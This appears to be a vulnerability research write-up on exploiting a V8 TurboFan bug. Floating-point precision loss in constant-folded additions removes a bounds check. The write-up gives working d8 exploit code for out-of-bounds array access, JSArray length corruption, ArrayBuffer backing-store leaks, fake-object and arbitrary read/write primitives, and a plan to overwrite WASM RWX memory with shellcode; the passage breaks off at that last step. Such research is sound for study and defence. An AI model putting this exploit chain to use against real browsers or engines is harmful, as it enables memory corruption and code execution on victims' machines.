The index type used by CheckBounds is Range(0,2) (but in reality, its value can be up to 4) whereas the length type is Range(4,4). Therefore, the index always looks in bounds, making the CheckBounds disappear. In this case, we can load/store 8 or 16 bytes further: the length is 4 and we read at index 4. You could also have an array of length 3 and read at index 3 or 4.

Actually, if we execute the script, we get some OOB access and leak memory!

$ d8 trigger.js --allow-natives-syntax
3.0046854007112e-310
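
The unsound fold can also be reproduced outside of V8. The following is only a toy model, not TurboFan code: the node shape, add, evaluate and reduceDuplicateAddition are hypothetical names, and z is treated as a plain constant rather than a typed Phi node. It mirrors the four code paths of ReduceAddition and shows the index the typer believes in (2) next to the index the folded graph actually produces (4).

```javascript
// Toy model: a node is a plain number (NumberConstant) or a NumberAdd object.
const add = (left, right) => ({ op: "NumberAdd", left, right });
const isAdd = (n) => typeof n === "object" && n !== null && n.op === "NumberAdd";
const isConst = (n) => typeof n === "number";

// Evaluate the graph one double addition at a time, like the runtime would.
const evaluate = (n) => (isConst(n) ? n : evaluate(n.left) + evaluate(n.right));

// Mirrors the four code paths of ReduceAddition.
function reduceDuplicateAddition(node) {
  if (!isAdd(node)) return node;
  if (!isAdd(node.left)) return node;          // [1] left input is not an addition
  if (!isConst(node.right)) return node;       // [2] right input is not a constant
  if (!isConst(node.left.right)) return node;  // [3] parent's right input is not a constant
  return add(node.left.left, node.left.right + node.right); // [4] fold both constants
}

const z = 2 + 4503599627370495 + 4503599627370495; // 9007199254740992
const before = add(add(z, 1), 1);                  // z + 1 + 1
const after = reduceDuplicateAddition(before);     // z + 2

const offset = 4503599627370495 * 2;
const typedIndex = evaluate(before) - offset;  // what the stale range type assumes
const actualIndex = evaluate(after) - offset;  // what the reduced graph computes
console.log(typedIndex, actualIndex);
```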


Exploitation

Now that we understand the bug, we may want to improve our primitive. For instance, it would be interesting to get the ability to read and write more memory.

Improving the primitive

One thing to try is to find a value such that the difference between x + n + n and x + m (with m = n + n and x = Number.MAX_SAFE_INTEGER + 1) is big enough.

For instance, replacing x + 007199254740989 + 9007199254740966 by x + 9014398509481956 gives us an out-of-bounds offset of 4 instead of 2.

d8> sum = 007199254740989 + 9007199254740966
9014398509481956
d8> a = x + sum
18021597764222948
d8> b = x + 007199254740989 + 9007199254740966
18021597764222944
d8> a - b
4
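
The delta grows because the spacing between adjacent doubles doubles each time a power of two is crossed. The sketch below is an illustration rather than part of the exploit: ulp is a hypothetical helper name, and it assumes a finite, normalized input. It reads the 11-bit exponent field and derives the gap to the next representable double.

```javascript
const buf = new ArrayBuffer(8);
const f64 = new Float64Array(buf);
const u64 = new BigUint64Array(buf);

// Gap between a finite, normalized double and the next larger double.
function ulp(value) {
  f64[0] = value;
  const exponent = Number((u64[0] >> 52n) & 0x7ffn); // 11-bit biased exponent
  return 2 ** (exponent - 1023 - 52);                // unbias, then scale by the 52 fraction bits
}

console.log(ulp(Number.MAX_SAFE_INTEGER)); // spacing just below 2^53
console.log(ulp(2 ** 53));                 // spacing in [2^53, 2^54)
console.log(ulp(18021597764222948));       // spacing in [2^54, 2^55)
```

With x + n + n landing above 2^54, every intermediate result is rounded to a multiple of 4, which is where the larger gap between the sequential and the folded computation comes from.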


And what if we chain more additions to get even more precision loss, for example x + n + n + n + n being transformed into x + 4n?

d8> var sum = 007199254740989 + 9007199254740966 + 007199254740989 + 9007199254740966
undefined
d8> var x = Number.MAX_SAFE_INTEGER + 1
undefined
d8> x + sum
27035996273704904
d8> x + 007199254740989 + 9007199254740966 + 007199254740989 + 9007199254740966
27035996273704896
d8> 27035996273704904 - 27035996273704896
8


Now we get a delta of 8.
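
These experiments can be automated with a small helper. This is a sketch with a hypothetical name (foldDelta); it simply compares adding the constants one at a time with adding their pre-computed sum, which is what the reducer does. The literal 007199254740989 from the transcripts is written as 7199254740989 here: d8 parses it as decimal because it contains the digits 8 and 9, and the leading-zero form is rejected in strict mode.

```javascript
// Difference between x + (n1 + n2 + ...) and ((x + n1) + n2) + ...
function foldDelta(x, addends) {
  const sequential = addends.reduce((acc, n) => acc + n, x); // one rounding per step
  const folded = x + addends.reduce((acc, n) => acc + n);    // constants summed first
  return folded - sequential;
}

const x = Number.MAX_SAFE_INTEGER + 1;
const n1 = 7199254740989;
const n2 = 9007199254740966;

console.log(foldDelta(x, [1, 1]));
console.log(foldDelta(x, [n1, n2]));
console.log(foldDelta(x, [n1, n2, n1, n2]));
```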

Or maybe we could amplify the precision loss even more using other operators?

d8> var x = Number.MAX_SAFE_INTEGER + 1
undefined
d8> 10 * (x + 1 + 1)
90071992547409920
d8> 10 * (x + 2)
90071992547409940


That gives us a delta of 20: the precision loss is 2, and the multiplication by 10 scales it to 2 * 10 = 20.

Step 0 : Corrupting a FixedDoubleArray

First, we want to observe the memory layout to know what we are leaking and what exactly we want to overwrite. For that, I simply use my custom %DumpObjects v8 runtime function. I also use an ArrayBuffer with two views, one Float64Array and one BigUint64Array, to easily convert between 64-bit floats and 64-bit integers.

let ab = new ArrayBuffer(8);
let fv = new Float64Array(ab);
let dv = new BigUint64Array(ab);

let f2i = (f) => {
fv[0] = f;
return dv[0];
}

let hexprintablei = (i) => {
return (i).toString(16).padStart(16,"0");
}

let debug = (x,z, leak) => {
print("oob index is " + z);
print("length is " + x.length);
print("leaked 0x" + hexprintablei(f2i(leak)));
%DumpObjects(x,13); // 23 & 3 to dump the jsarray's elements
};

let opt_me = (x) => {
let arr = new Array(1.1,1.2,1.3);
arr2 = new Array(42.1,42.0,42.0);
let y = (x == "foo") ? 4503599627370495 : 4503599627370493;
let z = 2 + y + y ; // 2 + 4503599627370495 * 2 = 9007199254740992
z = z + 1 + 1;
z = z - (4503599627370495*2);
let leak = arr[z];
if (x == "foo")
debug(arr,z, leak);
return leak;
}

opt_me("");
%OptimizeFunctionOnNextCall(opt_me);
let res = opt_me("foo");
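
The conversion helpers can be tried on their own, without the d8-only natives. The snippet below is a standalone sketch: the view names and the hex helper are illustrative, and i2f mirrors the helper of the same name from the full exploit. The expected bit patterns are the ones visible in the memory dumps of this section.

```javascript
const buffer = new ArrayBuffer(8);
const floatView = new Float64Array(buffer);
const intView = new BigUint64Array(buffer);

// Reinterpret the 8 bytes of a double as a 64-bit unsigned integer.
const f2i = (f) => { floatView[0] = f; return intView[0]; };
// Reinterpret a 64-bit unsigned integer as a double.
const i2f = (i) => { intView[0] = BigInt(i); return floatView[0]; };
// Zero-padded hexadecimal, matching the dump format.
const hex = (i) => i.toString(16).padStart(16, "0");

console.log(hex(f2i(1.1)));   // bit pattern stored for arr[0]
console.log(hex(f2i(42.1)));  // bit pattern stored for arr2[0]
console.log(i2f(0x0000000300000000n)); // a Smi length read back as a tiny double
```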


That gives the following results :

oob index is 4
length is 3
leaked 0x0000000300000000
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x00002e5fddf8b6a8    0x00002af7fe681451    MAP_TYPE
0x00002e5fddf8b6b0    0x0000000300000000
0x00002e5fddf8b6b8    0x3ff199999999999a    arr[0]
0x00002e5fddf8b6c0    0x3ff3333333333333    arr[1]
0x00002e5fddf8b6c8    0x3ff4cccccccccccd    arr[2]
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x00002e5fddf8b6d0    0x00002af7fe681451    MAP_TYPE // also arr[3]
0x00002e5fddf8b6d8    0x0000000300000000    arr[4] with OOB index!
0x00002e5fddf8b6e0    0x40450ccccccccccd    arr2[0] == 42.1
0x00002e5fddf8b6e8    0x4045000000000000    arr2[1] == 42.0
0x00002e5fddf8b6f0    0x4045000000000000
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x00002e5fddf8b6f8    0x0000290fb3502cf1    MAP_TYPE    arr2 JSArray
0x00002e5fddf8b700    0x00002af7fe680c19    FIXED_ARRAY_TYPE [as]
0x00002e5fddf8b708    0x00002e5fddf8b6d1    FIXED_DOUBLE_ARRAY_TYPE


Obviously, the FixedDoubleArrays of arr and arr2 are contiguous. At arr[3] we've got the map of arr2's FixedDoubleArray and at arr[4] we've got its length (encoded as an Smi, which is 32 bits even on 64-bit platforms). Please note that we slightly changed the trigger code:

< let arr = new Array(1.1,1.2,1.3,1.4);
---
> let arr = new Array(1.1,1.2,1.3);


Otherwise we would read/write the map instead, as the following dump demonstrates:

oob index is 4
length is 4
leaked 0x0000057520401451
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x30 ] -----
0x0000108bcf50b6c0    0x0000057520401451    MAP_TYPE
0x0000108bcf50b6c8    0x0000000400000000
0x0000108bcf50b6d0    0x3ff199999999999a    arr[0] == 1.1
0x0000108bcf50b6d8    0x3ff3333333333333    arr[1]
0x0000108bcf50b6e0    0x3ff4cccccccccccd    arr[2]
0x0000108bcf50b6e8    0x3ff6666666666666    arr[3] == 1.4
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x0000108bcf50b6f0    0x0000057520401451    MAP_TYPE    arr[4] with OOB index!
0x0000108bcf50b6f8    0x0000000300000000
0x0000108bcf50b700    0x40450ccccccccccd
0x0000108bcf50b708    0x4045000000000000
0x0000108bcf50b710    0x4045000000000000
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x0000108bcf50b718    0x00001dd08d482cf1    MAP_TYPE
0x0000108bcf50b720    0x0000057520400c19    FIXED_ARRAY_TYPE
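
The length words in these dumps (0x0000000300000000, 0x0000000400000000) are Smis. As a rough sketch, assuming a 64-bit build without pointer compression as in the dumps above (payload in the upper 32 bits, lower 32 bits zero), they can be encoded and decoded as follows. The helper names are hypothetical.

```javascript
// Encode a small integer the way it appears in the dumps: value << 32.
const smiToRaw = (n) => BigInt.asUintN(64, BigInt(n) << 32n);
// Decode a raw 64-bit word back to its signed 32-bit payload.
const rawToSmi = (raw) => Number(BigInt.asIntN(64, raw) >> 32n);
// Heuristic only: a word with an empty lower half could be a Smi.
const looksLikeSmi = (raw) => (raw & 0xffffffffn) === 0n;

console.log(smiToRaw(3).toString(16).padStart(16, "0"));
console.log(rawToSmi(0x0000000400000000n));
console.log(looksLikeSmi(0x0000057520401451n)); // a tagged map pointer is not a Smi
```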


Step 1 : Corrupting a JSArray and leaking an ArrayBuffer's backing store

The problem with step 0 is that we merely overwrite the FixedDoubleArray's length, which is pretty useless: that field does not control the JSArray's length the way we would like, it only describes the memory allocated for the fixed array. The only length we actually want to corrupt is the one from the JSArray.

Indeed, the length of the JSArray is not necessarily the same as the length of the underlying FixedArray (or FixedDoubleArray). Let's quickly check that.

d8> let a = new Array(0);
undefined
d8> a.push(1);
1
d8> %DebugPrint(a)
DebugPrint: 0xd893a90aed1: [JSArray]
- map: 0x18bbbe002ca1 <Map(HOLEY_SMI_ELEMENTS)> [FastProperties]
- prototype: 0x1cf26798fdb1 <JSArray[0]>
- elements: 0x0d893a90d1c9 <FixedArray[17]> [HOLEY_SMI_ELEMENTS]
- length: 1
- properties: 0x367210500c19 <FixedArray[0]> {
#length: 0x0091daa801a1 <AccessorInfo> (const accessor descriptor)
}
- elements: 0x0d893a90d1c9 <FixedArray[17]> {
0: 1
1-16: 0x3672105005a9 <the_hole>
}


In this case, even though the length of the JSArray is 1, the underlying FixedArray has a length of 17, which is just fine! But that is something that you want to keep in mind.

If you want to get an OOB R/W primitive, it is the JSArray's length that you want to overwrite. Also, if you were to have an out-of-bounds access on such an array, you may want to check that the size of the underlying fixed array is not too big. So, let's tweak our code a bit to target the JSArray's length!

If you look at the memory dump, you may think that having the JSArray allocated before the FixedDoubleArray might be convenient, right?

Right now the layout is:

FIXED_DOUBLE_ARRAY_TYPE
FIXED_DOUBLE_ARRAY_TYPE
JS_ARRAY_TYPE


Let's simply change the way we are allocating the second array.

23c23
<   arr2 = new Array(42.1,42.0,42.0);
---
>   arr2 = Array.of(42.1,42.0,42.0);


Now we have the following layout

FIXED_DOUBLE_ARRAY_TYPE
JS_ARRAY_TYPE
FIXED_DOUBLE_ARRAY_TYPE

oob index is 4
length is 3
leaked 0x000009d6e6600c19
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
----- [ JS_ARRAY_TYPE : 0x20 ] -----


Cool, now we are able to access the JSArray instead of the FixedDoubleArray. However, we're accessing its properties field.

Thanks to the precision loss when transforming +1+1 into +2 we get a difference of 2 between the computations. If we get a difference of 4, we'll be at the right offset. Transforming +1+1+1 into +3 will give us this!

d8> x + 1 + 1 + 1
9007199254740992
d8> x + 3
9007199254740996

26c26
<   z = z + 1 + 1;
---
>   z = z + 1 + 1 + 1;


Now we are able to read/write the JSArray's length.

oob index is 6
length is 3
leaked 0x0000000300000000
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x000004144950b6e0    0x00001b7451b01451    MAP_TYPE
0x000004144950b6e8    0x0000000300000000
0x000004144950b6f0    0x3ff199999999999a    // arr[0]
0x000004144950b6f8    0x3ff3333333333333
0x000004144950b700    0x3ff4cccccccccccd
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x000004144950b708    0x0000285651602d41    MAP_TYPE
0x000004144950b710    0x00001b7451b00c19    FIXED_ARRAY_TYPE
0x000004144950b718    0x000004144950b751    FIXED_DOUBLE_ARRAY_TYPE
0x000004144950b720    0x0000000300000000    // arr[6]
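
The relation between an out-of-bounds index and the address it touches is simple arithmetic. The sketch below uses hypothetical helper names and assumes the FixedDoubleArray layout visible in the dumps (an 8-byte map word, an 8-byte length word, then 8-byte elements). It checks the indices against the addresses printed above.

```javascript
const HEADER_SIZE = 0x10n; // map word + length word
const DOUBLE_SIZE = 8n;

// Address reached by elements[index] for a FixedDoubleArray at `base` (untagged).
const elementAddress = (base, index) => base + HEADER_SIZE + DOUBLE_SIZE * BigInt(index);
// Inverse: which index reaches `target`?
const indexForAddress = (base, target) => Number((target - base - HEADER_SIZE) / DOUBLE_SIZE);

// Step 1 layout: index 6 lands on the JSArray's length field.
console.log(elementAddress(0x000004144950b6e0n, 6).toString(16));
// Step 0 layout: index 4 lands on the second FixedDoubleArray's length.
console.log(elementAddress(0x00002e5fddf8b6a8n, 4).toString(16));
```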


Leaking the ArrayBuffer's data is now very easy. Just allocate it right after the second JSArray.

let arr = new Array(MAGIC,MAGIC,MAGIC);
arr2 = Array.of(1.2); // allows to put the JSArray *before* the fixed arrays
ab = new ArrayBuffer(AB_LENGTH);


This way, we get the following memory layout :

----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x00003a4d7608bb48    0x000023fe25c01451    MAP_TYPE
0x00003a4d7608bb50    0x0000000300000000
0x00003a4d7608bb58    0x3ff199999999999a    arr[0]
0x00003a4d7608bb60    0x3ff199999999999a
0x00003a4d7608bb68    0x3ff199999999999a
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x00003a4d7608bb70    0x000034dc44482d41    MAP_TYPE
0x00003a4d7608bb78    0x000023fe25c00c19    FIXED_ARRAY_TYPE
0x00003a4d7608bb80    0x00003a4d7608bba9    FIXED_DOUBLE_ARRAY_TYPE
0x00003a4d7608bb88    0x0000006400000000
----- [ FIXED_ARRAY_TYPE : 0x18 ] -----
0x00003a4d7608bb90    0x000023fe25c007a9    MAP_TYPE
0x00003a4d7608bb98    0x0000000100000000
0x00003a4d7608bba0    0x000023fe25c005a9    ODDBALL_TYPE
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x18 ] -----
0x00003a4d7608bba8    0x000023fe25c01451    MAP_TYPE
0x00003a4d7608bbb0    0x0000000100000000
0x00003a4d7608bbb8    0x3ff3333333333333    arr2[0]
----- [ JS_ARRAY_BUFFER_TYPE : 0x40 ] -----
0x00003a4d7608bbc0    0x000034dc444821b1    MAP_TYPE
0x00003a4d7608bbc8    0x000023fe25c00c19    FIXED_ARRAY_TYPE
0x00003a4d7608bbd0    0x000023fe25c00c19    FIXED_ARRAY_TYPE
0x00003a4d7608bbd8    0x0000000000000100
0x00003a4d7608bbe0    0x0000556b8fdaea00    ab's backing_store pointer!
0x00003a4d7608bbe8    0x0000000000000002
0x00003a4d7608bbf0    0x0000000000000000
0x00003a4d7608bbf8    0x0000000000000000


We can simply use the corrupted JSArray (arr2) to read the ArrayBuffer (ab). This will be useful later because memory pointed to by the backing_store is fully controlled by us, as we can put arbitrary data in it, through a data view (like a Uint32Array).
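
As an illustration of that read, the following sketch models what arr2 sees past its single element as an array of raw 64-bit words copied from the dump above. It is a simulation, not the exploit itself, and findBackingStore is a hypothetical name. The consistency checks are the same ones the full exploit performs: the candidate must be untagged, look like a pointer, and be followed by the word 2.

```javascript
// Words seen through arr2, starting at arr2[0] (values copied from the dump).
const oobWords = [
  0x3ff3333333333333n, // arr2[0] == 1.2
  0x000034dc444821b1n, // ArrayBuffer map
  0x000023fe25c00c19n, // properties
  0x000023fe25c00c19n, // elements
  0x0000000000000100n, // byte length (AB_LENGTH)
  0x0000556b8fdaea00n, // backing_store
  0x0000000000000002n,
  0x0000000000000000n,
];

function findBackingStore(words, byteLength) {
  const lenIdx = words.indexOf(byteLength);
  if (lenIdx === -1) throw new Error("could not find array buffer");
  const candidate = words[lenIdx + 1];
  if ((candidate & 1n) !== 0n) throw new Error("backing store should not be tagged");
  if (candidate <= 0x10000n) throw new Error("backing store does not look like a pointer");
  if (words[lenIdx + 2] !== 2n) throw new Error("unexpected layout after backing store");
  return { lenIdx, backingStore: candidate };
}

const found = findBackingStore(oobWords, 0x100n);
console.log(found.lenIdx, "0x" + found.backingStore.toString(16));
```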

Now that we know a pointer to some fully controlled content, let's go to step 2!

Step 2 : Getting a fake object

Arrays of PACKED_ELEMENTS can contain tagged pointers to JavaScript objects. For those unfamiliar with v8, the elements kind of a JSArray gives information about the type of elements it is storing. Read this if you want to know more about elements kinds.

d8> var objects = new Array(new Object())
d8> %DebugPrint(objects)
DebugPrint: 0xd79e750aee9: [JSArray]
- elements: 0x0d79e750af19 <FixedArray[1]> {
0: 0x0d79e750aeb1 <Object map = 0x19c550d80451>
}
0x19c550d82d91: [Map]
- elements kind: PACKED_ELEMENTS


Therefore, if you can corrupt the content of an array of PACKED_ELEMENTS, you can put in a pointer to a crafted object. This is basically the idea behind the fakeobj primitive. The idea is to simply put the address backing_store+1 in this array (the original pointer is not tagged, and v8 expects pointers to JavaScript objects to be tagged). Let's first simply write the value 0x414141414141 in the controlled memory.

Indeed, we know that the very first field of any object is a pointer to a map (long story short, the map is the object that describes the type of the object. Other engines call it a Shape or a Structure. If you want to know more, just read the previous post on SpiderMonkey or this blog post).

Therefore, if v8 indeed considers our pointer as an object pointer, when trying to use it, we should expect a crash when dereferencing the map.

Achieving this is as easy as allocating an array with an object pointer, looking for the index to the object pointer, and replacing it by the (tagged) pointer to the previously leaked backing_store.

let arr = new Array(MAGIC,MAGIC,MAGIC);
arr2 = Array.of(1.2); // allows to put the JSArray *before* the fixed arrays
evil_ab = new ArrayBuffer(AB_LENGTH);
packed_elements_array = Array.of(MARK1SMI,Math,MARK2SMI);


Quickly check the memory layout.

----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x0000220f2ec82410    0x0000353622a01451    MAP_TYPE
0x0000220f2ec82418    0x0000000300000000
0x0000220f2ec82420    0x3ff199999999999a
0x0000220f2ec82428    0x3ff199999999999a
0x0000220f2ec82430    0x3ff199999999999a
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x0000220f2ec82438    0x0000261a44682d41    MAP_TYPE
0x0000220f2ec82440    0x0000353622a00c19    FIXED_ARRAY_TYPE
0x0000220f2ec82448    0x0000220f2ec82471    FIXED_DOUBLE_ARRAY_TYPE
0x0000220f2ec82450    0x0000006400000000
----- [ FIXED_ARRAY_TYPE : 0x18 ] -----
0x0000220f2ec82458    0x0000353622a007a9    MAP_TYPE
0x0000220f2ec82460    0x0000000100000000
0x0000220f2ec82468    0x0000353622a005a9    ODDBALL_TYPE
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x18 ] -----
0x0000220f2ec82470    0x0000353622a01451    MAP_TYPE
0x0000220f2ec82478    0x0000000100000000
0x0000220f2ec82480    0x3ff3333333333333
----- [ JS_ARRAY_BUFFER_TYPE : 0x40 ] -----
0x0000220f2ec82488    0x0000261a446821b1    MAP_TYPE
0x0000220f2ec82490    0x0000353622a00c19    FIXED_ARRAY_TYPE
0x0000220f2ec82498    0x0000353622a00c19    FIXED_ARRAY_TYPE
0x0000220f2ec824a0    0x0000000000000100
0x0000220f2ec824a8    0x00005599e4b21f40
0x0000220f2ec824b0    0x0000000000000002
0x0000220f2ec824b8    0x0000000000000000
0x0000220f2ec824c0    0x0000000000000000
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x0000220f2ec824c8    0x0000261a44682de1    MAP_TYPE
0x0000220f2ec824d0    0x0000353622a00c19    FIXED_ARRAY_TYPE
0x0000220f2ec824d8    0x0000220f2ec824e9    FIXED_ARRAY_TYPE
0x0000220f2ec824e0    0x0000000300000000
----- [ FIXED_ARRAY_TYPE : 0x28 ] -----
0x0000220f2ec824e8    0x0000353622a007a9    MAP_TYPE
0x0000220f2ec824f0    0x0000000300000000
0x0000220f2ec824f8    0x0000001300000000    // MARK 1 for memory scanning
0x0000220f2ec82500    0x00002f3befd86b81    JS_OBJECT_TYPE
0x0000220f2ec82508    0x0000003700000000    // MARK 2 for memory scanning


Good, the FixedArray with the pointer to the Math object is located right after the ArrayBuffer. Observe that we put markers so as to scan memory instead of hardcoding offsets (which would be bad if we were to have a different memory layout for whatever reason).
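
The marker scan can be sketched outside of d8 by simulating the memory that arr2 overlaps. In this illustration, the words are copied from the FixedArray in the dump above, a Float64Array stands in for the corrupted arr2, and findObjectSlot is a hypothetical name. The search itself follows the full exploit: look for MARK1 as a double, then confirm MARK2 two slots later.

```javascript
const MARK1 = 0x0000001300000000n; // Smi 0x13
const MARK2 = 0x0000003700000000n; // Smi 0x37

// Simulated memory: map, length, MARK1, pointer to Math, MARK2.
const words = new BigUint64Array([
  0x0000353622a007a9n, 0x0000000300000000n,
  MARK1, 0x00002f3befd86b81n, MARK2,
]);
const asDoubles = new Float64Array(words.buffer); // stand-in for the corrupted arr2

const scratch = new ArrayBuffer(8);
const sf = new Float64Array(scratch);
const si = new BigUint64Array(scratch);
const f2i = (f) => { sf[0] = f; return si[0]; };
const i2f = (i) => { si[0] = i; return sf[0]; };

// Returns the index of the slot holding the object pointer.
function findObjectSlot(doubles) {
  const markIdx = doubles.indexOf(i2f(MARK1));
  if (markIdx === -1) throw new Error("could not find object pointer mark");
  if (f2i(doubles[markIdx + 2]) !== MARK2) throw new Error("second mark is missing");
  return markIdx + 1;
}

const slot = findObjectSlot(asDoubles);
console.log(slot, "0x" + f2i(asDoubles[slot]).toString(16));
```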

After locating the (oob) index to the object pointer, simply overwrite it and use it.

let view = new BigUint64Array(evil_ab);
view[0] = 0x414141414141n; // initialize the fake object with this value as a map pointer
// ...
arr2[index_to_object_pointer] = tagFloat(fbackingstore_ptr);
packed_elements_array[1].x; // crash on 0x414141414141 because it is used as a map pointer
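
The tagFloat helper used above comes from the full exploit: it reinterprets the double as a 64-bit integer and adds 1 to set the low tag bit. A standalone version, runnable outside d8, could look like this. The scratch view names and isTagged are illustrative, and the pointer value is the backing_store from the dump above.

```javascript
const scratch = new ArrayBuffer(8);
const fv = new Float64Array(scratch);
const dv = new BigUint64Array(scratch);

const f2i = (f) => { fv[0] = f; return dv[0]; };
const i2f = (i) => { dv[0] = BigInt(i); return fv[0]; };

// Turn an untagged pointer (carried as a double) into a tagged one.
const tagFloat = (f) => { fv[0] = f; dv[0] += 1n; return fv[0]; };
// v8 heap object pointers have their least significant bit set.
const isTagged = (i) => (i & 1n) === 1n;

const fbackingstore_ptr = i2f(0x00005599e4b21f40n);
const tagged = f2i(tagFloat(fbackingstore_ptr));
console.log("0x" + tagged.toString(16), isTagged(tagged));
```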


Et voilà!

Step 3 : Arbitrary read/write primitive

Going from step 2 to step 3 is fairly easy. We just need our ArrayBuffer to contain data that look like an actual object. More specifically, we would like to craft an ArrayBuffer with a controlled backing_store pointer. You can also directly corrupt the existing ArrayBuffer to make it point to arbitrary memory. Your call!

Don't forget to choose a length that is big enough for the data you plan to write (most likely, your shellcode).

let view = new BigUint64Array(evil_ab);
for (let i = 0; i < ARRAYBUFFER_SIZE / PTR_SIZE; ++i) {
view[i] = f2i(arr2[ab_len_idx-3+i]);
if (view[i] > 0x10000 && !(view[i] & 1n))
view[i] = 0x42424242n; // backing_store
}
// [...]
arr2[magic_mark_idx+1] = tagFloat(fbackingstore_ptr); // object pointer
// [...]
let rw_view = new Uint32Array(packed_elements_array[1]);
rw_view[0] = 0x1337; // *0x42424242 = 0x1337
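
To make the copy loop concrete, here is a simulation on the eight words of the ArrayBuffer from the step 2 dump. It is only a sketch: forgeArrayBuffer is a hypothetical name and the words are plain BigInts instead of out-of-bounds reads. The filter is the one used above: any word that is larger than 0x10000 and untagged is assumed to be the backing_store and gets replaced.

```javascript
// The 0x40 bytes of the real ArrayBuffer, as read through arr2 (from the dump).
const realArrayBuffer = [
  0x0000261a446821b1n, // map (tagged)
  0x0000353622a00c19n, // properties (tagged)
  0x0000353622a00c19n, // elements (tagged)
  0x0000000000000100n, // byte length
  0x00005599e4b21f40n, // backing_store (untagged)
  0x0000000000000002n,
  0x0000000000000000n,
  0x0000000000000000n,
];

// Copy every word, swapping the untagged pointer for an address of our choice.
function forgeArrayBuffer(words, newBackingStore) {
  return words.map((w) => (w > 0x10000n && (w & 1n) === 0n ? newBackingStore : w));
}

const fake = forgeArrayBuffer(realArrayBuffer, 0x42424242n);
fake.forEach((w, i) => console.log(i, "0x" + w.toString(16).padStart(16, "0")));
```

Only the word at index 4 changes, which matches the view[4] writes in the full exploit.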


You should get a crash like this.

$ d8 rw.js
[+] corrupted JSArray's length
[+] Found backingstore pointer : 0000555c593d9890

Received signal 11 SEGV_MAPERR 000042424242

==== C stack trace ===============================

 [0x555c577b81a4]
 [0x7ffa0331a390]
 [0x555c5711b4ae]
 [0x555c5728c967]
 [0x555c572dc50f]
 [0x555c572dbea5]
 [0x555c572dbc55]
 [0x555c57431254]
 [0x555c572102fc]
 [0x555c57215f66]
 [0x555c576fadeb]
[end of stack trace]


Step 4 : Overwriting WASM RWX memory

Now that we've got an arbitrary read/write primitive, we simply want to overwrite RWX memory, put a shellcode in it and call it. We'd rather not do any kind of ROP or JIT code reuse (0vercl0k did this for SpiderMonkey).

V8 used to have the JIT'ed code of its JSFunction located in RWX memory. But this is not the case anymore.

However, as Andrea Biondo showed on his blog, WASM is still using RWX memory. All you have to do is instantiate a WASM module and, from one of its functions, find the WASM instance object that contains a pointer to the RWX memory in its JumpTableStart field.

Plan of action:

1. Read the JSFunction's shared function info
2. Get the WASM exported function from the shared function info
3. Get the WASM instance from the exported function
4. Read the JumpTableStart field from the WASM instance

As I mentioned above, I use a modified v8 engine for which I implemented a %DumpObjects feature that prints an annotated memory dump. It makes it very easy to understand how to get from a WASM JS function to the JumpTableStart pointer. I put some code here (use it at your own risk as it might crash sometimes). Also, depending on your current checkout, the code may not be compatible and you will probably need to tweak it.

%DumpObjects will pinpoint the pointer like this:

----- [ WASM_INSTANCE_TYPE : 0x118 : REFERENCES RWX MEMORY] -----
[...]
0x00002fac7911ec20    0x0000087e7c50a000    JumpTableStart [RWX]


So let's just find the RWX memory from a WASM function.

sample_wasm.js can be found here.

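
The plan of action boils down to four dependent reads. The sketch below simulates them with a tiny address-to-word map filled with values from the %DumpObjects output of this section. The memory map, read64, field and findJumpTableStart are hypothetical stand-ins for the arbitrary read primitive, and the offsets are the WasmOffsets derived in this section.

```javascript
// Simulated memory: only the four words the walk needs, copied from the dumps.
const memory = new Map([
  [0x00002fac7911ed10n + 3n * 8n, 0x00002fac7911ecd9n],  // JSFunction -> SharedFunctionInfo
  [0x00002fac7911ecd8n + 1n * 8n, 0x00002fac7911ecb1n],  // SFI -> WasmExportedFunctionData
  [0x00002fac7911ecb0n + 2n * 8n, 0x00002fac7911eb29n],  // function data -> WasmInstance
  [0x00002fac7911eb28n + 31n * 8n, 0x0000087e7c50a000n], // instance -> JumpTableStart
]);

const read64 = (addr) => {
  if (!memory.has(addr)) throw new Error("unmapped read at 0x" + addr.toString(16));
  return memory.get(addr);
};

const WasmOffsets = {
  shared_function_info: 3,
  wasm_exported_function_data: 1,
  wasm_instance: 2,
  jump_table_start: 31,
};

// Read the word at `index` inside the object behind a tagged pointer.
const field = (tagged, index) => read64(tagged - 1n + BigInt(index) * 8n);

function findJumpTableStart(taggedFunction) {
  const sfi = field(taggedFunction, WasmOffsets.shared_function_info);
  const data = field(sfi, WasmOffsets.wasm_exported_function_data);
  const instance = field(data, WasmOffsets.wasm_instance);
  return field(instance, WasmOffsets.jump_table_start); // raw pointer, not tagged
}

const rwx = findJumpTableStart(0x00002fac7911ed11n);
console.log("0x" + rwx.toString(16));
```
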
d8> load("sample_wasm.js")
d8> %DumpObjects(global_test,10)
----- [ JS_FUNCTION_TYPE : 0x38 ] -----
0x00002fac7911ed10    0x00001024ebc84191    MAP_TYPE
0x00002fac7911ed18    0x00000cdfc0080c19    FIXED_ARRAY_TYPE
0x00002fac7911ed20    0x00000cdfc0080c19    FIXED_ARRAY_TYPE
0x00002fac7911ed28    0x00002fac7911ecd9    SHARED_FUNCTION_INFO_TYPE
0x00002fac7911ed30    0x00002fac79101741    NATIVE_CONTEXT_TYPE
0x00002fac7911ed38    0x00000d1caca00691    FEEDBACK_CELL_TYPE
0x00002fac7911ed40    0x00002dc28a002001    CODE_TYPE
----- [ TRANSITION_ARRAY_TYPE : 0x30 ] -----
0x00002fac7911ed48    0x00000cdfc0080b69    MAP_TYPE
0x00002fac7911ed50    0x0000000400000000
0x00002fac7911ed58    0x0000000000000000
function 1() { [native code] }


d8> %DumpObjects(0x00002fac7911ecd9,11)
----- [ SHARED_FUNCTION_INFO_TYPE : 0x38 ] -----
